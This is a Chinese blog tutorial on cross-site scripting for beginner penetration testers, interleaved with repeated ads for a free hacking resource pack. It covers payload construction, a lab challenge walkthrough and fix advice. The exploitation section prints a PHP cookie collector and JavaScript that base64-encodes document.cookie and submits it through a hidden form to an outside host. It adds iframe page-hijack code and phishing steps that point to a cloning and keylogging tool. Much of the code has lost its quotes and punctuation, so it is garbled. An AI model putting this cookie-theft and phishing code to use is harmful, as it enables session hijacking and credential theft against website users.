提供企业网站建设公司,微营销系统,四川展陈公司排名前十,方庄网站建设公司一、前言
这是我给粉丝盆友们整理的网络安全渗透测试入门阶段XSS攻击基础教程。
本教程主要讲解XSS漏洞检测、利用和防御机制。
喜欢的朋友们#xff0c;记得给我点赞支持和收藏一下#xff0c;关注我#xff0c;学习黑客技术。 Web的安全问题越来越严重#xff0c;漏洞…一、前言
这是我给粉丝盆友们整理的网络安全渗透测试入门阶段XSS攻击基础教程。
本教程主要讲解XSS漏洞检测、利用和防御机制。
喜欢的朋友们记得给我点赞支持和收藏一下关注我学习黑客技术。 Web的安全问题越来越严重漏洞总是在不停的出现而我们以前一直在做的都是打补丁就这样漏洞、补丁、补丁、漏洞的恶忄生循环着。其实很多的攻击都是可以预防的只要我们做好前期的工作。
我给大家准备了全套的《网络安全入门进阶学习资源包》包含各种常用工具网络攻防黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~
二、JS代码的调用方式
前面的文章我们了解到javascript有能力操控浏览器并且可以在用户无感的情况下执行一系列恶意攻击的操作。所以大白在开始进行XSS漏洞检测手法讲解之前需要粉丝们先了解一下JS代码他是如何被网页调用并且执行的。
JavaScript调用网页的手法一共有3种 事件法 标签法 伪协议法
事件法
HTML4的新特性之一是事件它使得用户在对网页进行一些操作时可以触发js代码从而达到更好的交互效果。比如
!DOCTYPE html
html
body
img idimage src/i/eg\_smile.gif /
input typebutton οnclickchange() value修改/
!-- 当用户点击按钮时触发js修改图片的路径 --
input typebutton οnclickback() value还原/
!-- 当用户点击按钮时触发js修改图片的路径 --
script
// 点击 修改 时调用的js代码
function change(){ document.getElementById(image).src /i/porsche.jpg; } // 点击 还原 时调用的js代码 function back(){ document.getElementById(image).src /i/eg\_smile.gif; } /script p原始图像是 eg\_smile.gif但脚本将其更改为 porsche.jpg/p /body /html 在前端开发中通常包含非常多的事件类型感兴趣的可以去看看
HTML 事件 | 菜鸟教程
标签法
在HTML语言中不同的标签代表不同的功能这里面就有一个标签用来运行javascript脚本的
script/script 我们通过这个标签就可以导入javascript代码。标签法导入js代码它有两种形式 可以直接在标签对之间写js代码 script
//在标签对之间书写js代码
alert(1);
/script 然后通过src属性导入js文件 script srctarget.js/script
// src可以是相对路径也可以是超链接
script srchttps://unpkg.com/vue3/dist/vue.global.js/script 特别需要注意的是这两种形式只能二选一来使用。
协议法
通常伪协议Pseudo-protocols是一种用于URL统一资源定位符中的特殊协议标识符。注意它们不是真正的协议而是在特定的上下文中执行特定的操作或触发特定的行为。
伪协议的种类非常多常用的就包括dict伪协议、gopher伪协议
php伪协议、data伪协议、等等。而在触发js代码的伪协议中重点要说两种
javascript:
a hrefjavascript:alert(1)/a data:
script srcdata:text/javascript;base64,YWxlcnQoMSk/script 通过这两种方式都能触发执行js代码
三、XSS漏洞挖掘思路
我们在挖掘XSS漏洞的时候只需要去找能够输入内容的地方比如表单字段、查询字符串、URL参数、Cookie、HTTP头等用户可以输入内容的地方在这些地方传入构造好的恶意代码如果有代码被触发了就说明这个点是存在XSS漏洞的。
1. 查询字符串
对于有搜索或者查询功能的网站我们可以先简单判断输入的字符是否会在前端输出。如果有输出那么我们就可以常去对这些输出的位置测试XSS漏洞 我给大家准备了全套的《网络安全入门进阶学习资源包》包含各种常用工具网络攻防黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~
2. 数据提交表单
通常来说表单测试xss相对会复杂一些。因为表单会出现这两种情况 我们提交数据之后前端不会显示我们提交的表单信息。经典案例 问卷调查、意见反馈信息等等 我们提交数据之后前端会显示我们提交的表单信息。经典案例 注册信息、留言信息、评论信息、订单提交信息等
对于这两种形式的表单我们使用的测试方法会有所不同。
对于第一种形式由于前端不会显示我们提交的表单信息所以我们只能通过一些特殊的方式来进行测试盲打
盲打是在我们不能直接看到回显时使用的一种的攻击手法这个的核心目标是通过一些间接的证据来体现脚本被执行成功。这就好比SQL注入的盲注在SQL盲注中我们可以通过bool比较让网页显示不一样的内容。可以让数据库休眠延长网站的响应时间。XSS盲打也是借助这样的原理来实现不过这个需要考验攻击者的js代码编写水平。
当然也有简单的方式借助XSS平台是否抓取到用户cookie来判断XSS漏洞是否存在。
XSS盲打实战案例某网页漫画_xss实战
这样的方式虽然能够成功实现 一个XSS盲打攻击但是需要提醒各位使用XSS平台容易造成法律风险。所以在实际项目或src挖掘时需要慎重使用。
对于第二种我们直接使用正常的测试语句去进行测试就行了 通过这样的方式就可以对前端有回显的表单进行XSS测试。这样我们就能够判断出表单是否存在XSS漏洞了。
3.Cookie、请求头等位置
cookie和请求头中的这些传参位置通常容易被开发人员和安全设备忽略掉。这个是由于一般cookie这些数据不会直接显示在前端页面上。但是这并不意味着这些地方就是安全的一定不可能存在XSS的。
我们对Cookie等位置的测试一般也都是以盲打为主
测试使用的语句
了解完需要测试点位之后接下来就需要去构造测试使用的javascript语句了。这些构造通常由三种形式 标签风格 借助各种标签来调用js代码常用的标签由svgiframeimg script 等等 svg onLoad svg onLoadjavascript:javascript:alert(303)/svg onLoad
iframe onLoad iframe onLoadjavascript:javascript:alert(296)/iframe onLoad
!--\\x3Eimg srcxxx:x οnerrοrjavascript:alert(358) --
scriptjavascript:alert(356)/script\\x0B
script charset\\x22javascript:alert(357)/script 直接在输入点传入完整的标签这种方式主要用于网站将数据输出在了两个标签之间的情况 事件风格 通过闭合标签中的属性实现向标签中插入新的属性或者事件 οnerrοralert(1) \\\\ οnfοcusalert(1) autofocusautofocus \\\\ 如果你由仔细观察过标签风格中给出的xss语句你会发现其实在标签风格中就已经有不少poc是在借助事件来测试XSS了它们和我们们现在说的这个的唯一区别就是事件风格不在受限于 字符了。我们是直接将数据插到了已有的标签中去实现攻击的 伪协议风格 伪协议风格的使用条件相对来说要求比较严格需要标签存在 href 属性或者网页能需要填写http连接。所以通常会借助 a 标签或者一些特殊的文档语法来测试 a hrefjavascript:alert(1) testxss/a \[xsstest\](javascript:alert(1))四、XSS的利用手法
XSS中最常见的攻击手段包括以下四点 窃取用户信息 恶意重定向 篡改网页内容 发起钓鱼攻击
窃取用户信息
JavaScript可以在浏览器中获取用户的一些基本信息cookie、个人资料等。这些实现的方式也并不复杂最简单的方式如下
通过vps搭建一个站点要求如下: 任意用户能访问接受2个传参网址url地址和cookie并将传递的参数进行base64解密将域名时间戳作为文件名保存传递过来的cookie信息 实现代码如下
?
if(isset($\_REQUEST\[cookieinfo\]) isset($\_REQUEST\[url\]) ){
$info base64\_decode($\_REQUEST\[cookieinfo\]); $domain base64\_decode($\_REQUEST\[url\]); file\_put\_contents($domain.time()..txt, $info); echo nice to get this message;
}else{ echo hello world;
}
? 构建xss攻击语句要求如下 1. 通过js获取目标站点的 cookie、host并将这些信息进行base64编码 2. 创建span标签、form标签、iframe标签 3. span标签设置为 display:none ,并且添加 form标签和 iframe标签为子标签 4. 设置form标签将数据提交到接受网站并且按照接收平台的规则将数据进行组装 5. 设置form提交结果相应到iframe标签中 6. 将span标签添加到 html标签中并且提交form标签 代码实现如下
(function(){
// 获得目标站点的信息
var cookieinfo btoa(document.cookie);
var url btoa(window.location.host.replace(:,\_));
// 设置接受信息的站点
var target\_url http://192.168.226.1/phpinfo.php;
// 创建需要使用到的标签
var html document.getElementsByTagName(html)\[0\];
var span document.createElement(span);
var form document.createElement(form);
var input1 document.createElement(input);
var input2 document.createElement(input);
// 设置form标签的基本属性
form.action target\_url;
// 设置传递的值域1 cookie信息
input1.name cookieinfo;
input1.type text;
input1.setAttribute(value,cookieinfo );
// 设置传递的值域2 域名信息
input2.name url;
input2.type text;
input2.setAttribute(value,url)
// 将值域填充到form表单中
form.appendChild(input1);
form.appendChild(input2);
// 创建一个iframe用于接受form表单提交后返回的数据
var iframe document.createElement(iframe);
iframe.name \_test;
// 设置form的target实现隐藏form回显的问题
form.target iframe.name;
// 将form 和 iframe 都填充到 span 中
span.appendChild(form);
span.appendChild(iframe);
// 将 span 标签隐藏
span.style.display none;
// 然后将表单都填充到html页面中
html.appendChild(span);
// 提交表单
form.submit(); })() 通过这样的方式就可以简单的实现用户数据窃取。当然这样的代码比较丑陋开发能力有限见谅在实际测试的时候有更优解XSS平台
xss平台的作用和上面的功能是一样的。它是别人开发好的一套相对优雅的解法。但是需要注意一点公共XSS平台是不安全的XSS平台的维护人员是能从XSS平台的后台获取所有打到该平台的XSS信息。
所以如果在实际项目中项目对数据的保密性有要求切忌使用公开XSS平台。
不过还是不能绕过XSS平台的简介这里以 xsscom.com 平台为例进行讲解大部分的XSS平台都是大同小异的 首先访问站点之后进行一个注册。因为国内政策的原因现在大部分的XSS平台注册都需要邀请码同时需要使用邮箱进行注册。邀请码这个东西没辙不过现在有一部分的XSS平台是不限制邮箱的所以我们可以通过临时邮箱来注册这些平台。攻防中一定要保护还好自己的个人隐私
我给大家准备了全套的《网络安全入门进阶学习资源包》包含各种常用工具网络攻防黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~
如何获取临时邮箱你猜猜看
注册完成之后使用账户进行登录我就不在截图了。登录成功之后创建一个项目。一部分XSS平台对项目创建和数据存储有限制这个自行探索。 创建 → 项目名称、描述 → 勾选模块(默认模块(必勾)、XSS.js(必勾)、基础认证钓鱼模块(可选)) → 完成 当创建完项目之后将会得到一个代码页面拖到最下面就会有XSS平台的利用方法 然后将这些利用方式替换我们的XSS检测点的无害XSS就能实现 基础的Cookie窃取 这个解法就很优雅了。唯一的缺点是使用的是公共XSS平台。信息保密性无法保证。
恶意重定向
这个理解起来也很简单就是通过向网页插入一串JS代码让网页自动跳转到指定的网站中。
window.location.hrefhttp://192.168.226.1 当然这个方式并不够优雅因为这个跳转之后浏览器地址栏的内容也会发生变化。这个迷惑性相对来说比较低只要稍微注意一点就能发现网站发生了异常。
篡改网页内容
所以就有了更优雅的攻击方式篡改网页内容。在不修改地址栏的内容实现对网站内容的篡改。
这里介绍一个新的平台xssaq.com。这也是一个XSS平台只不过它更加的暴力和优雅 而我刚刚说的篡改网页你内容就能通过他的一项配置来实现 通过这个配置就可以再不修改地址栏的内容。将网站重定向到指定的url中。在没有去看他的实现代码之前我想到的思路是这样的: 通过js将原来的body给删除通过js创建一个form表单然后请求目标地址通过js创建一个 iframe 标签用来接收form表单的返回结果。重新生成body并且将form和iframe插入body标签。将body插入到html标签 在模仿Cookie窃取的思路来实现这个攻击。实现一下这个代码
(function(){ var body document.getElementsByTagName(body)\[0\];
body.parentNode.removeChild(body); var html document.getElementsByTagName(html)\[0\]; body document.createElement(body); html.appendChild(body); var iframe document.createElement(iframe); iframe.name \_test; var form document.createElement(form); form.actionhttps://www.anchorubik.com; form.methodget; form.target iframe.name; body.appendChild(form); body.appendChild(iframe); iframe.style.cssText position:absolute; z-index:100000; width:100%;height:100%; frameborderno;scrolling:no; form.submit();})() 不过这个代码实现的并不优雅。因为当遇到一些站点不允许iframe跨域调用时页面就会报错。而且如果目标站点使用的是https时重定向的目标站也必须使用https。
然后我就去看了一眼xssaq平台是怎么实现的。嗯我思路是没有错的 不过我尝试着直接拿上面的这一串代码放到浏览器中打self xss发现效果没有上面的代码好。稍微修改一下自己的代码然他显得不那么丑陋
(function(){
var html document.getElementsByTagName(html)\[0\]; html.removeChild(document.getElementsByTagName(body)\[0\]); var body document.createElement(body); body.style.cssTextscrolling:no; html.appendChild(body); var iframe document.createElement(iframe); iframe.srchttps://www.anchorubik.com; body.appendChild(iframe); iframe.style.cssText position:absolute; z-index:100000; width:100%;height:100%; frameborderno;scrolling:no; })() 优雅不过如果细心一点还是能发现问题: 在网页上的操作地址栏的内容将维持不变 发起钓鱼攻击
在了解了串改网页内容攻击的原理之后还想要进一步攻击那不就是钓鱼了而有了篡改网页内容的基础之后接下来要钓鱼还不是轻轻松松 通过在自己的vps上模仿搭建目标站点的登录页面。在自己的vps中实现以下功能: a. 将用户提交的数据转发到原网站 b. 如果登录成功则将数据保存在本地。并且不在劫持页面。 c. 如果登录失败则将响应信息返回给目标用户知道用户登录成功 思路有了接下来就是代码实现来了我觉得这个时候各位应该可以拿起cs了。cs有一个钓鱼模块能够轻松复刻目标站点并且实现键盘记录。通过XSS篡改目标网站到我们cs生成的网站能够完美实现钓鱼。
具体的实现方式我这里就去写了有点懒在这里我想讨论另一个东西如果目标站点存在XSS漏洞我已经能够通过XSS获取目标的Cookie了还有必要去钓鱼吗
五、XSS漏洞修复建议
1、防堵跨站漏洞阻止攻击者利用在被攻击网站上发布跨站攻击语句
不可以信任用户提交的任何内容首先代码里对用户输入的地方和变量都需要仔细检查长度和对”””””””’”等字符做过滤其次任何内容写到页面之前都必须加以encode避免不小心把htmltag弄出来。这一个层面做好至少可以堵住超过一半的XSS攻击。
2、cookie防盗
首先避免直接在cookie中泄露用户隐私例如email、密码等等。其次通过使cookie和系统ip绑定来降低cookie泄露后的危险。这样攻击者得到的cookie没有实际价值不可能拿来重放。
3、尽量采用POST而非GET提交表单
POST操作不可能绕开javascript的使用这会给攻击者增加难度减少可利用的跨站漏洞。
4、严格检查refer
检查httprefer是否来自预料中的url。这可以阻止第2类攻击手法发起的http请求也能防止大部分第1类攻击手法除非正好在特权操作的引用页上种了跨站访问。
5、将单步流程改为多步在多步流程中引入效验码
多步流程中每一步都产生一个验讠正码作为hidden表单元素嵌在中间页面下一步操作时这个验讠正码被提交到服务器服务器检查这个验讠正码是否匹配。首先这为第1类攻击者大大增加了麻烦。其次攻击者必须在多步流程中拿到上一步产生的效验码才有可能发起下一步请求这在第2类攻击中是几乎无法做到的。
6、引入用户交互
简单的一个看图识数可以堵住几乎所有的非预期特权操作。
7、只在允许anonymous访问的地方使用动态的javascript。
8、对于用户提交信息的中的img等link检查是否有重定向回本站、不是真的图片等可疑操作。
9、内部管理网站的问题
很多时候内部网站往往疏于关注安全问题只是简单的限制访问来源。这种网站往往对XSS攻击毫无抵抗力需要多加注意。
虽然XSS的攻击很灵活只要我们能做好上述几点是可以组织大部分XSS的再及时打好补丁可以最大程度的减少来自跨站脚本攻击XSS的威胁。
申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。
我给大家准备了全套的《网络安全入门进阶学习资源包》包含各种常用工具网络攻防黑客技术电子书以及视频教程需要的小伙伴可以扫描下方二维码或链接免费领取~
六、Xss小游戏通关攻略
实验环境xss小游戏源码phpstudy
源码地址https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip
实验步骤启动phpstudy浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关输入的变量直接被输出直接构造payload即可。
http://127.0.0.1/xss/level1.php?name
http://127.0.0.1/xss/level1.php?nametest‘ 第二关搜索框的XSS输入的变量直接输出到input标签内闭合input标签构造XSS备注echo语句输出到页面时使用了htmlspecialchars函数。 payload: http://127.0.0.1/xss/level2.php?keywordtest
第三关输入的变量被htmlspecialchars函数处理了这个函数处理的字符有 没有处理单引号因此利用单引号构造payload先通过单引号闭合value 第四关大于号 小于号 被过滤了构造不包含这两个符号的payloadvalue的值与第三关有所差异这里需要使用双引号用于闭合value标签
(http://127.0.0.1/xss/level3.php?keyword%27%20rel)
http://127.0.0.1/xss/level4.php?keywordtestοnmοuseοver‘alert(1)
http://127.0.0.1/xss/level4.php?keywordtest%22%CE%BFnm%CE%BFuse%CE%BFver%27%20rel
“http://127.0.0.1/xss/level4.php?keywordtestοnmοuseοveralert(1)”)’ 第五关script 和on被替换了构造不含这两个的payload
127.0.0.1/xss/level5.php?keywordfind a way out!1 第六关比第五关过滤的东西更多包括了src data href 可以把这些关键字大写以绕过这些过滤payload: http://127.0.0.1/xss/level6.php?keywordbreak it out!1 第七关增加strtolower函数把输入变量转成了小写但过滤的字符强制变成空格可以使用中间的script变成了空格正好变成了
127.0.0.1/xss/level7.php?keywordmove up!1alert(1) 第八关input中输入的变量通过htmlspecialchars被处理了且双引号被替换成空无法通过双引号闭合value。这里的输入被添加至超链接中直接构造payload:javascript对其中的字母进行实体编码
搜索框中输入 javascript:alert(1) 点击添加到友情链接点击链接 第九关上一关的基础上判断输入的链接是否包含http://因为用的是strpos函数没有限制必须是开始的位置所以在上一关的基础上修改payload为 javascript:alert(‘http://’) 第十关keyword变量没办法构造payload发现隐藏变量t_sort可以被写入但过滤了大于小于号构造不含大于小于号的payload类型改为text具体如下
[http://127.0.0.1/xss/level10.php?t_sortοnmοuseοveralert(1)typetext](http://127.0.0.1/xss/level10.php?t_sort%22%CE%BFnm%CE%BFuse%CE%BFver%27%20rel http://127.0.0.1/xss/level10.php?t_sort“οnmοuseοveralert(1)type“text”)” 第十一关查看源码可以看到t_ref的value是我们访问这个网页的referer值故可以抓包修改referer在referer后加入” οnmοuseοver‘alert(1)’ type“text”。 第十二关查看源码$str33最初是由HTTP_USER_AGENT过滤 而来修改User-Agent在后面加上 οnmοuseοver‘alert(1)’ type“text”。 第十三关同上查看源码$str33最初是由cookie过滤 而来修改cookie在后面加上 οnmοuseοver‘alert(1)’ type“text”。 第十四关网站已经打不开略过
第十五关angularjs的ng-include
http://127.0.0.1/xss /level15.php?src‘level1.php?nametestimg src1 οnerrοralert(1)’ 第十六关script / 空格被过滤了 用%0d换行符绕过
http://127.0.0.1/xss/level16.php?keyword%3Cimg%0dsrc1%0dοnerrοralert(2)%3Ealert(2)
http://127.0.0.1/xss /level16.php?keywordimg%0Dsrc1%0Dοnerrοralert()
http://127.0.0.1/xss /level16.php?keywordimg%0asrc1%0aοnerrοralert()
http://127.0.0.1/xss /level16.php?keywordimg%0asrcx%0donErroralert(‘xss’)
http://127.0.0.1/xss /level16.php?keywordiframe%0asrcx%0dοnmοuseοveralert’1’
http://127.0.0.1/xss /level16.php?keywordsvg%0aοnlοadalert’1’ 第十七关arg01和arg02 被htmlspecialchars过滤了通过οnmοuseοveralert(1)绕过。
http://127.0.0.1/xss/level17.php?arg01aarg02%20οnmοuseοveralert%282%29 第十八关同十七直接把arg02 设置为οnmοuseοver‘alert(1)’
http://192.168.40.128/xss/level18.php?arg01aarg02 οnmοuseοveralert(2) 第十九关和二十关属于Flash xss,略过。
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助
对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。
因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取
1.成长路线图学习规划
要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。
对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 2.网安入门到进阶视频教程
很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程扫描领取哈
3.SRC黑客文档
大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录
SRC技术文籍 黑客资料由于是敏感资源这里不能直接展示哦 全套教程扫描领取哈
4.护网行动资料
其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指
5.黑客必读书单 6.网络安全岗面试题合集
当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。
所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~
